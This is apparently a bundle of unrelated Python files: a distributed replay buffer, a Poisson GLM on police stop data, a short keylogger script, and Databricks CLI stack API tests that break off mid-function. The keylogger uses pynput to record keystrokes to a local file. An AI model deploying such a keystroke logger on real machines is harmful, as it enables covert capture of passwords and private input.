from typing import Union, Dict, List, Any, Callable from threading import RLock from ..transition import Transition from .buffer import Buffer from machin.parallel.distributed import RpcGroup import torch as t import numpy as np import itertools as it def _round_up(num): return int(np.ceil(num)) class DistributedBuffer(Buffer): def __init__(self, buffer_name: str, group: RpcGroup, buffer_size: int, *_, **__): """ Create a distributed replay buffer instance. To avoid issues caused by tensor device difference, all transition objects are stored in device "cpu". Distributed replay buffer constitutes of many local buffers held per process, transmissions between processes only happen during sampling. During sampling, the tensors in "state", "action" and "next_state" dictionaries, along with "reward", will be concatenated in dimension 0. any other custom keys specified in ``**kwargs`` will not be concatenated. .. seealso:: :class:`.Buffer` Note: Since ``append()`` operates on the local buffer, in order to append to the distributed buffer correctly, please make sure that your actor is also the local buffer holder, i.e. a member of the ``group`` Args: buffer_size: Maximum local buffer size. group: Process group which holds this buffer. buffer_name: A unique name of your buffer. """ super().__init__(buffer_size, "cpu") self.buffer_name = buffer_name self.group = group assert group.is_member() # register services, so that we may access other buffers _name = "/" + group.get_cur_name() self.group.register(buffer_name + _name + "/_size_service", self._size_service) self.group.register( buffer_name + _name + "/_clear_service", self._clear_service ) self.group.register( buffer_name + _name + "/_sample_service", self._sample_service ) self.wr_lock = RLock() def append( self, transition: Union[Transition, Dict], required_attrs=("state", "action", "next_state", "reward", "terminal"), ): # DOC INHERITED with self.wr_lock: super().append(transition, required_attrs=required_attrs) def clear(self): """ Clear current local buffer. """ with self.wr_lock: return super().clear() def all_clear(self): """ Remove all entries from all local buffers. """ future = [ self.group.registered_async(self.buffer_name + "/" + m + "/_clear_service") for m in self.group.get_group_members() ] for fut in future: fut.wait() def size(self): """ Returns: Length of current local buffer. """ with self.wr_lock: return super().size() def all_size(self): """ Returns: Total length of all buffers. 
""" future = [] count = 0 for m in self.group.get_group_members(): future.append( self.group.registered_async( self.buffer_name + "/" + m + "/_size_service" ) ) for fut in future: count += fut.wait() return count def sample_batch( self, batch_size: int, concatenate: bool = True, device: Union[str, t.device] = None, sample_method: Union[Callable, str] = "random_unique", sample_attrs: List[str] = None, additional_concat_attrs: List[str] = None, *_, **__, ) -> Any: # DOC INHERITED p_num = self.group.size() local_batch_size = _round_up(batch_size / p_num) future = [ self.group.registered_async( self.buffer_name + "/" + m + "/_sample_service", args=(local_batch_size, sample_method), ) for m in self.group.get_group_members() ] results = [fut.wait() for fut in future] all_batch_size = sum([r[0] for r in results]) all_batch = list(it.chain(*[r[1] for r in results])) if device is None: device = "cpu" if sample_attrs is None: sample_attrs = all_batch[0].keys() if additional_concat_attrs is None: additional_concat_attrs = [] return ( all_batch_size, Buffer.post_process_batch( all_batch, device, concatenate, sample_attrs, additional_concat_attrs ), ) def _size_service(self): # pragma: no cover return self.size() def _clear_service(self): # pragma: no cover self.clear() def _sample_service(self, batch_size, sample_method): # pragma: no cover if isinstance(sample_method, str): if not hasattr(self, "sample_method_" + sample_method): raise RuntimeError( f"Cannot find specified sample method: {sample_method}" ) sample_method = getattr(self, "sample_method_" + sample_method) # sample raw local batch from local buffer with self.wr_lock: local_batch_size, local_batch = sample_method(self.buffer, batch_size) return local_batch_size, local_batch
the-stack_106_24320
""" Implementation of the hierarchical poisson glm model, with a precinct-specific term, an ethnicity specific term, and an offset term. The data are tuples of (ethnicity, precinct, num_stops, total_arrests), where the count variables num_stops and total_arrests refer to the number of stops and total arrests of an ethnicity in the specified precinct over a period of 15 months. The rate we are measuring is the rate of stops-per-arrest for certain ethnicities in different precincts. Y_ep = num stops of ethnicity e in precinct p N_ep = num arests of e in p log lam_ep = alpha_e + beta_p + mu + log(N_ep * 15/12) #yearly correction term Y_ep ~ Pois(lam_ep) """ import numpy as np import numpy.random as npr import scipy.misc as scpm import pandas as pd import os # credit dataset def process_dataset(): data_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, os.pardir)) + "/data/datasets/frisk_with_noise.dat" df = pd.read_csv(data_dir, skiprows=6, delim_whitespace=True) # compute proportion black in precinct, black = 1 # first aggregate by precinct/ethnicity, and sum over populations popdf = df[['pop', 'precinct', 'eth']]. \ groupby(['precinct', 'eth'])['pop'].apply(sum) percent_black = np.array([ popdf[i][1] / float(popdf[i].sum()) for i in range(1, 76)] ) precinct_type = pd.cut(percent_black, [0, .1, .4, 1.]) # df['precinct_type'] = precinct_type.codes[df.precinct.values-1] return df df = process_dataset() def make_model_funs(crime=1., precinct_type=1): """ crime: 1=violent, 2=weapons, 3=property, 4=drug eth : 1=black, 2 = hispanic, 3=white precincts: 1-75 precinct_type = (0, .1], (.1, .4], (.4, 1.] """ # subselect crime/precinct, set up design matrix sdf = df[ (df['crime']==crime) & (df['precinct_type']==precinct_type) ] # make dummies for precincts, etc one_hot = lambda x, k: np.array(x[:,None] == np.arange(k)[None, :], dtype=int) precincts = np.sort(np.unique(sdf['precinct'])) Xprecinct = one_hot(sdf['precinct'], 76)[:, precincts] Xeth = one_hot(sdf['eth'], 4)[:, 1:-1] yep = sdf['stops'].values lnep = np.log(sdf['past.arrests'].values) + np.log(15./12) num_eth = Xeth.shape[1] num_precinct = Xprecinct.shape[1] # unpack a flat param vector aslice = slice(0, num_eth) bslice = slice(num_eth, num_eth + num_precinct) mslice = slice(bslice.stop, bslice.stop + 1) lnsa_slice = slice(mslice.stop, mslice.stop + 1) lnsb_slice = slice(lnsa_slice.stop, lnsa_slice.stop+1) num_params = lnsb_slice.stop pname = lambda s, stub: ['%s_%d'%(stub, i) for i in range(s.stop-s.start)] param_names = [pname(s, stub) for s, stub in zip([aslice, bslice, mslice, lnsa_slice, lnsb_slice], ['alpha', 'beta', 'mu', 'lnsigma_a', 'lnsigma_b'])] param_names = [s for pn in param_names for s in pn] def unpack(th): """ unpack vectorized lndf """ th = np.atleast_2d(th) alpha_eth, beta_prec, mu, lnsigma_alpha, lnsigma_beta = \ th[:, aslice], th[:, bslice], th[:, mslice], \ th[:, lnsa_slice], th[:, lnsb_slice] return alpha_eth, beta_prec, mu, lnsigma_alpha, lnsigma_beta hyper_lnstd = np.array([[np.log(10.)]]) def lnpdf(th): # params alpha, beta, mu, lns_alpha, lns_beta = unpack(th) # priors ll_alpha = normal_lnpdf(alpha, 0, lns_alpha) ll_beta = normal_lnpdf(beta, 0, lns_beta) ll_mu = normal_lnpdf(mu, 0, hyper_lnstd) ll_salpha = normal_lnpdf(np.exp(lns_alpha), 0, hyper_lnstd) ll_sbeta = normal_lnpdf(np.exp(lns_beta), 0, hyper_lnstd) logprior = ll_alpha + ll_beta + ll_mu + ll_salpha + ll_sbeta # likelihood lnlam = (mu + lnep[None,:]) + \ np.dot(alpha, Xeth.T) + np.dot(beta, Xprecinct.T) loglike = 
np.sum(lnpoiss(yep, lnlam), 1) return (loglike + logprior).squeeze() return lnpdf, unpack, num_params, sdf, param_names from scipy.special import gammaln def lnpoiss(y, lnlam): """ log likelihood of poisson """ return y*lnlam - np.exp(lnlam) - gammaln(y+1) def normal_lnpdf(x, mean, ln_std): x = np.atleast_2d(x) D = x.shape[1] dcoef = 1. if ln_std.shape[1] != D: dcoef = D qterm = -.5 * np.sum((x - mean)**2 / np.exp(2.*ln_std), axis=1) coef = -.5*D * np.log(2.*np.pi) - dcoef * np.sum(ln_std, axis=1) return qterm + coef
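# --- Usage sketch (illustrative only) -----------------------------------------
# A hedged example of evaluating the model defined above: build the functions
# for one crime/precinct-type cell, then score an arbitrary random parameter
# vector. The values are placeholders; this only demonstrates the calling
# convention of make_model_funs() and lnpdf().
if __name__ == "__main__":
    lnpdf, unpack, num_params, sdf, param_names = \
        make_model_funs(crime=1., precinct_type=1)
    th = .01 * npr.randn(num_params)
    print("number of parameters:", num_params)
    print("first parameter names:", param_names[:5])
    print("log posterior value  :", lnpdf(th))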
the-stack_106_24321
import pynput
from datetime import datetime
from pynput.keyboard import Key, Listener

count = 0
keys = []


def on_press(key):
    """Buffer pressed keys and flush them to disk whenever space is hit."""
    global keys, count
    keys.append(key)
    count += 1
    if count >= 1:
        k = str(key).replace("'", "")
        if k.find("space") > 0:
            print(keys)
            count = 0
            write_file(keys)
            keys = []


def write_file(keys):
    """Append the buffered keys to log.txt, turning space/esc into newlines."""
    with open("log.txt", "a") as file:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                file.write('\n')
            elif k.find("esc") > 0:
                file.write('\n')
            if k.find("Key") == -1:
                file.write(k)


def on_release(key):
    # Stop the listener when Esc is released.
    if key == Key.esc:
        return False


with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
the-stack_106_24323
# Databricks CLI # Copyright 2018 Databricks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"), except # that the use of services to which certain application programming # interfaces (each, an "API") connect requires that the user first obtain # a license for the use of the APIs from Databricks, Inc. ("Databricks"), # by creating an account at www.databricks.com and agreeing to either (a) # the Community Edition Terms of Service, (b) the Databricks Terms of # Service, or (c) another written agreement between Licensee and Databricks # for the use of the APIs. # # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint:disable=redefined-outer-name # pylint:disable=too-many-locals # pylint:disable=unused-argument import os import copy import mock from requests.exceptions import HTTPError import pytest import databricks_cli.stack.api as api import databricks_cli.workspace.api as workspace_api from databricks_cli.stack.exceptions import StackError from databricks_cli.version import version as CLI_VERSION TEST_JOB_SETTINGS = { api.JOBS_RESOURCE_NAME: 'test job' } TEST_JOB_NONEXISTING_SETTINGS = { api.JOBS_RESOURCE_NAME: 'non-existing test job in workspace' } TEST_JOB_RESOURCE_ID = 'test job' TEST_JOB_RESOURCE = { api.RESOURCE_ID: TEST_JOB_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_PROPERTIES: TEST_JOB_SETTINGS } TEST_JOB_DATABRICKS_ID = {api.JOBS_RESOURCE_JOB_ID: 1234} TEST_WORKSPACE_NB_PROPERTIES = { api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.py', api.WORKSPACE_RESOURCE_PATH: '/test/notebook.py', api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.NOTEBOOK } TEST_WORKSPACE_DIR_PROPERTIES = { api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/workspace/dir', api.WORKSPACE_RESOURCE_PATH: '/test/dir', api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.DIRECTORY } TEST_WORKSPACE_NB_DATABRICKS_ID = {api.WORKSPACE_RESOURCE_PATH: '/test/notebook.py'} TEST_WORKSPACE_DIR_DATABRICKS_ID = {api.WORKSPACE_RESOURCE_PATH: '/test/dir'} TEST_DBFS_FILE_PROPERTIES = { api.DBFS_RESOURCE_SOURCE_PATH: 'test.jar', api.DBFS_RESOURCE_PATH: 'dbfs:/test/test.jar', api.DBFS_RESOURCE_IS_DIR: False } TEST_DBFS_DIR_PROPERTIES = { api.DBFS_RESOURCE_SOURCE_PATH: 'test/dbfs/dir', api.DBFS_RESOURCE_PATH: 'dbfs:/test/dir', api.DBFS_RESOURCE_IS_DIR: True } TEST_DBFS_FILE_DATABRICKS_ID = {api.DBFS_RESOURCE_PATH: 'dbfs:/test/test.jar'} TEST_DBFS_DIR_DATABRICKS_ID = {api.DBFS_RESOURCE_PATH: 'dbfs:/test/dir'} TEST_RESOURCE_ID = 'test job' TEST_RESOURCE_WORKSPACE_NB_ID = 'test notebook' TEST_RESOURCE_WORKSPACE_DIR_ID = 'test directory' TEST_WORKSPACE_NB_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_NB_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_PROPERTIES: TEST_WORKSPACE_NB_PROPERTIES } TEST_WORKSPACE_DIR_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_DIR_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_PROPERTIES: TEST_WORKSPACE_DIR_PROPERTIES } TEST_RESOURCE_DBFS_FILE_ID = 'test dbfs file' TEST_RESOURCE_DBFS_DIR_ID = 'test dbfs directory' TEST_DBFS_FILE_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_FILE_ID, 
api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_PROPERTIES: TEST_DBFS_FILE_PROPERTIES } TEST_DBFS_DIR_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_DIR_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_PROPERTIES: TEST_DBFS_DIR_PROPERTIES } TEST_JOB_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_JOB_DATABRICKS_ID } TEST_WORKSPACE_NB_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_NB_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_WORKSPACE_NB_DATABRICKS_ID } TEST_WORKSPACE_DIR_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_DIR_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_WORKSPACE_DIR_DATABRICKS_ID } TEST_DBFS_FILE_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_FILE_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_DBFS_FILE_DATABRICKS_ID } TEST_DBFS_DIR_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_DIR_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_DBFS_DIR_DATABRICKS_ID } TEST_STACK = { api.STACK_NAME: "test-stack", api.STACK_RESOURCES: [ TEST_JOB_RESOURCE, TEST_WORKSPACE_NB_RESOURCE, TEST_WORKSPACE_DIR_RESOURCE, TEST_DBFS_FILE_RESOURCE, TEST_DBFS_DIR_RESOURCE, { api.RESOURCE_ID: "NoStatusResource", api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_WRITE_STATUS: False, api.RESOURCE_PROPERTIES: { api.DBFS_RESOURCE_SOURCE_PATH: 'test.jar', api.DBFS_RESOURCE_PATH: 'dbfs:/test/test-no-status.jar', api.DBFS_RESOURCE_IS_DIR: False } } ] } TEST_STATUS = { api.STACK_NAME: "test-stack", api.CLI_VERSION_KEY: CLI_VERSION, api.STACK_DEPLOYED: [TEST_JOB_STATUS, TEST_WORKSPACE_NB_STATUS, TEST_WORKSPACE_DIR_STATUS, TEST_DBFS_FILE_STATUS, TEST_DBFS_DIR_STATUS, ] } class _TestJobsClient(object): def __init__(self): self.jobs_in_databricks = {} self.available_job_id = [1234, 12345] self.nonexisting_job_id = 111 def get_job(self, job_id, headers=None): if job_id not in self.jobs_in_databricks: # Job created is not found. raise HTTPError('Job not Found') else: return self.jobs_in_databricks[job_id] def reset_job(self, data, headers=None): if data[api.JOBS_RESOURCE_JOB_ID] not in self.jobs_in_databricks: raise HTTPError('Job Not Found') self.jobs_in_databricks[data[api.JOBS_RESOURCE_JOB_ID]]['job_settings'] = \ data['new_settings'] def create_job(self, job_settings, headers=None): job_id = self.available_job_id.pop() new_job_json = {api.JOBS_RESOURCE_JOB_ID: job_id, 'job_settings': job_settings.copy(), 'creator_user_name': '[email protected]', 'created_time': 987654321} self.jobs_in_databricks[job_id] = new_job_json return new_job_json def _list_jobs_by_name(self, job_name, headers=None): return [job for job in self.jobs_in_databricks.values() if job['job_settings']['name'] == job_name] @pytest.fixture() def stack_api(): workspace_api_mock = mock.patch('databricks_cli.stack.api.WorkspaceApi') jobs_api_mock = mock.patch('databricks_cli.stack.api.JobsApi') dbfs_api_mock = mock.patch('databricks_cli.stack.api.DbfsApi') workspace_api_mock.return_value = mock.MagicMock() jobs_api_mock.return_value = mock.MagicMock() dbfs_api_mock.return_value = mock.MagicMock() stack_api = api.StackApi(mock.MagicMock()) yield stack_api class TestStackApi(object): def test_deploy_job(self, stack_api): """ stack_api._deploy_job should create a new job when 1) A databricks_id is not given and a job with the same name does not exist in the settings. 
stack_api._deploy_job should reset/update an existing job when 1) A databricks_id is given 2) A databricks_id is not given but one job with the same name exists. A StackError should be raised when 1) A databricks_id is not given but there are multiple jobs with the same name that exist. """ test_job_settings = TEST_JOB_SETTINGS # Different name than TEST_JOB_SETTINGS alt_test_job_settings = {api.JOBS_RESOURCE_NAME: 'alt test job'} stack_api.jobs_client = _TestJobsClient() # TEST CASE 1: # stack_api._deploy_job should create job if databricks_id not given job doesn't exist res_databricks_id_1 = stack_api._deploy_job(test_job_settings) assert res_databricks_id_1 == {api.JOBS_RESOURCE_JOB_ID: 12345} # TEST CASE 2: # stack_api._deploy_job should reset job if databricks_id given. res_databricks_id_2 = stack_api._deploy_job(alt_test_job_settings, res_databricks_id_1) # physical job id not changed from last update assert res_databricks_id_2[api.JOBS_RESOURCE_JOB_ID] == \ res_databricks_id_1[api.JOBS_RESOURCE_JOB_ID] # TEST CASE 3: # stack_api._deploy_job should reset job if a databricks_id not given, but job with same # name found alt_test_job_settings['new_property'] = 'new_property_value' res_databricks_id_3 = stack_api._deploy_job(alt_test_job_settings) # physical job id not changed from last update assert res_databricks_id_3[api.JOBS_RESOURCE_JOB_ID] == \ res_databricks_id_2[api.JOBS_RESOURCE_JOB_ID] # TEST CASE 4 # If a databricks_id is not given but there is already multiple jobs of the same name in # databricks, an error should be raised # Add new job with different physical id but same name settings as alt_test_job_settings stack_api.jobs_client.jobs_in_databricks[123] = { api.JOBS_RESOURCE_JOB_ID: 123, 'job_settings': alt_test_job_settings } with pytest.raises(StackError): stack_api._deploy_job(alt_test_job_settings) # TEST CASE 5 # If a databricks_id is not found in workspace, then abort nonexisting_job_settings = TEST_JOB_NONEXISTING_SETTINGS nonexisting_databricks_id = { api.JOBS_RESOURCE_JOB_ID: stack_api.jobs_client.nonexisting_job_id } # Job deployment is aborted. Error message about the inconsistency should appear with pytest.raises(StackError): stack_api._deploy_job(nonexisting_job_settings, nonexisting_databricks_id) def test_deploy_workspace(self, stack_api, tmpdir): """ stack_api._deploy_workspace should call certain workspace client functions depending on object_type and error when object_type is defined incorrectly. 
""" test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.workspace_client.client = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output stack_api.workspace_client.import_workspace = mock.MagicMock() stack_api.workspace_client.import_workspace_dir = mock.MagicMock() test_workspace_nb_properties = TEST_WORKSPACE_NB_PROPERTIES.copy() test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_nb_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) os.makedirs( os.path.dirname(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH])) with open(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") test_workspace_dir_properties = TEST_WORKSPACE_DIR_PROPERTIES.copy() test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_dir_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) os.makedirs(test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH]) # Test Input of Workspace directory properties. dir_databricks_id = \ stack_api._deploy_workspace(test_workspace_dir_properties, None, True) stack_api.workspace_client.import_workspace_dir.assert_called_once() assert stack_api.workspace_client.import_workspace_dir.call_args[0][0] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] assert stack_api.workspace_client.import_workspace_dir.call_args[0][1] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH] assert dir_databricks_id == { api.WORKSPACE_RESOURCE_PATH: test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH]} # Test Input of Workspace notebook properties. nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) stack_api.workspace_client.import_workspace.assert_called_once() assert stack_api.workspace_client.import_workspace.call_args[0][0] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] assert stack_api.workspace_client.import_workspace.call_args[0][1] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH] assert nb_databricks_id == {api.WORKSPACE_RESOURCE_PATH: test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH]} # Test Input of Workspace notebook with html source test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.html'}) nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) assert stack_api.workspace_client.import_workspace.call_args[0][0] == 'test/notebook.html' # Test Input of Workspace notebook with dbc source test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.dbc'}) nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) assert stack_api.workspace_client.import_workspace.call_args[0][0] == 'test/notebook.dbc' # Should raise error if resource object_type doesn't match actually is in filesystem. 
test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.NOTEBOOK}) with pytest.raises(StackError): stack_api._deploy_workspace(test_workspace_dir_properties, None, True) # Should raise error if object_type is not NOTEBOOK or DIRECTORY test_workspace_dir_properties.update({api.WORKSPACE_RESOURCE_OBJECT_TYPE: 'INVALID_TYPE'}) with pytest.raises(StackError): stack_api._deploy_workspace(test_workspace_dir_properties, None, True) def test_deploy_dbfs(self, stack_api, tmpdir): """ stack_api._deploy_dbfs should call certain dbfs client functions depending on object_type and error when object_type is defined incorrectly. """ test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.dbfs_client.client = mock.MagicMock() stack_api.dbfs_client.client.get_status.return_value = test_deploy_output stack_api.dbfs_client.cp = mock.MagicMock() test_dbfs_file_properties = TEST_DBFS_FILE_PROPERTIES.copy() test_dbfs_file_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_dbfs_file_properties[ api.DBFS_RESOURCE_SOURCE_PATH])}) with open(test_dbfs_file_properties[api.DBFS_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") test_dbfs_dir_properties = TEST_DBFS_DIR_PROPERTIES.copy() test_dbfs_dir_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_dbfs_dir_properties[ api.DBFS_RESOURCE_SOURCE_PATH])}) os.makedirs(test_dbfs_dir_properties[api.DBFS_RESOURCE_SOURCE_PATH]) dir_databricks_id = \ stack_api._deploy_dbfs(test_dbfs_dir_properties, None, True) assert stack_api.dbfs_client.cp.call_count == 1 assert stack_api.dbfs_client.cp.call_args[1]['recursive'] is True assert stack_api.dbfs_client.cp.call_args[1]['overwrite'] is True assert stack_api.dbfs_client.cp.call_args[1]['src'] == \ test_dbfs_dir_properties[api.DBFS_RESOURCE_SOURCE_PATH] assert stack_api.dbfs_client.cp.call_args[1]['dst'] == \ test_dbfs_dir_properties[api.DBFS_RESOURCE_PATH] assert dir_databricks_id == {api.DBFS_RESOURCE_PATH: test_dbfs_dir_properties[api.DBFS_RESOURCE_PATH]} nb_databricks_id = \ stack_api._deploy_dbfs(test_dbfs_file_properties, None, True) assert stack_api.dbfs_client.cp.call_count == 2 assert stack_api.dbfs_client.cp.call_args[1]['recursive'] is False assert stack_api.dbfs_client.cp.call_args[1]['overwrite'] is True assert stack_api.dbfs_client.cp.call_args[1]['src'] == \ test_dbfs_file_properties[api.DBFS_RESOURCE_SOURCE_PATH] assert stack_api.dbfs_client.cp.call_args[1]['dst'] == \ test_dbfs_file_properties[api.DBFS_RESOURCE_PATH] assert nb_databricks_id == {api.DBFS_RESOURCE_PATH: test_dbfs_file_properties[api.DBFS_RESOURCE_PATH]} # Should raise error if resource properties is_dir field isn't consistent with whether the # resource is a directory or not locally. test_dbfs_dir_properties.update({api.DBFS_RESOURCE_IS_DIR: False}) with pytest.raises(StackError): stack_api._deploy_dbfs(test_dbfs_dir_properties, None, True) def test_deploy_resource(self, stack_api): """ stack_api._deploy_resource should return relevant fields in output if deploy done correctly. 
""" # TODO(alinxie) Change this test to directly call stack_api.deploy # A job resource should have _deploy_resource call on _deploy_job stack_api._deploy_job = mock.MagicMock() test_job_databricks_id = {api.JOBS_RESOURCE_JOB_ID: 12345} stack_api._deploy_job.return_value = (test_job_databricks_id, {}) test_job_resource_status = {api.RESOURCE_DATABRICKS_ID: test_job_databricks_id} new_resource_status = stack_api._deploy_resource(TEST_JOB_RESOURCE, resource_status=test_job_resource_status) assert api.RESOURCE_ID in new_resource_status assert api.RESOURCE_DATABRICKS_ID in new_resource_status assert api.RESOURCE_SERVICE in new_resource_status stack_api._deploy_job.assert_called() assert stack_api._deploy_job.call_args[0][0] == TEST_JOB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_job.call_args[0][1] == test_job_databricks_id # A workspace resource should have _deploy_resource call on _deploy_workspace stack_api._deploy_workspace = mock.MagicMock() test_workspace_databricks_id = {api.WORKSPACE_RESOURCE_PATH: '/test/path'} stack_api._deploy_workspace.return_value = (test_workspace_databricks_id, {}) test_workspace_resource_status = {api.RESOURCE_DATABRICKS_ID: test_workspace_databricks_id} stack_api._deploy_resource(TEST_WORKSPACE_NB_RESOURCE, resource_status=test_workspace_resource_status, overwrite=True) stack_api._deploy_workspace.assert_called() assert stack_api._deploy_workspace.call_args[0][0] == \ TEST_WORKSPACE_NB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_workspace.call_args[0][1] == test_workspace_databricks_id # A dbfs resource should have _deploy_resource call on _deploy_workspace stack_api._deploy_dbfs = mock.MagicMock() stack_api._deploy_dbfs.return_value = (TEST_DBFS_FILE_DATABRICKS_ID, {}) stack_api._deploy_resource(TEST_DBFS_FILE_RESOURCE, resource_status=TEST_DBFS_FILE_STATUS, overwrite_dbfs=True) stack_api._deploy_dbfs.assert_called() assert stack_api._deploy_dbfs.call_args[0][0] == \ TEST_DBFS_FILE_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_dbfs.call_args[0][1] == \ TEST_DBFS_FILE_STATUS[api.RESOURCE_DATABRICKS_ID] # If there is a nonexistent type, raise a StackError. resource_badtype = { api.RESOURCE_SERVICE: 'nonexist', api.RESOURCE_ID: 'test', api.RESOURCE_PROPERTIES: {'test': 'test'} } with pytest.raises(StackError): stack_api._deploy_resource(resource_badtype) def test_download_workspace(self, stack_api, tmpdir): """ stack_api._download_workspace should call certain workspace client functions depending on object_type and error when object_type is defined incorrectly. 
""" test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.workspace_client.client = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output stack_api.workspace_client.export_workspace = mock.MagicMock() stack_api.workspace_client.export_workspace_dir = mock.MagicMock() test_workspace_nb_properties = TEST_WORKSPACE_NB_PROPERTIES.copy() test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_nb_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) test_workspace_dir_properties = TEST_WORKSPACE_DIR_PROPERTIES.copy() test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_dir_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) stack_api._download_workspace(test_workspace_dir_properties, True) stack_api.workspace_client.export_workspace_dir.assert_called_once() assert stack_api.workspace_client.export_workspace_dir.call_args[0][0] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH] assert stack_api.workspace_client.export_workspace_dir.call_args[0][1] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] stack_api._download_workspace(test_workspace_nb_properties, True) stack_api.workspace_client.export_workspace.assert_called_once() created_dir = os.path.dirname( os.path.abspath(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH])) assert os.path.exists(created_dir) assert stack_api.workspace_client.export_workspace.call_args[0][0] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH] assert stack_api.workspace_client.export_workspace.call_args[0][1] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] # Should raise error if object_type is not NOTEBOOK or DIRECTORY test_workspace_dir_properties.update({api.WORKSPACE_RESOURCE_OBJECT_TYPE: 'INVALID_TYPE'}) with pytest.raises(StackError): stack_api._download_workspace(test_workspace_dir_properties, True) def test_download_resource(self, stack_api): """ stack_api._download_resource should correctly call on a specific resource's download function. """ # A workspace resource should have _download_resource call on _download_workspace stack_api._download_workspace = mock.MagicMock() stack_api._download_resource(TEST_WORKSPACE_NB_RESOURCE, overwrite=True) stack_api._download_workspace.assert_called() assert stack_api._download_workspace.call_args[0][0] == \ TEST_WORKSPACE_NB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._download_workspace.call_args[0][1] is True # overwrite argument # If there is a nonexistent service, StackError shouldn't be raised, since it is intentional # that some resource services cannot be downloaded, like jobs. resource_badservice = { api.RESOURCE_SERVICE: 'nonexist', api.RESOURCE_ID: 'test', api.RESOURCE_PROPERTIES: {'test': 'test'} } 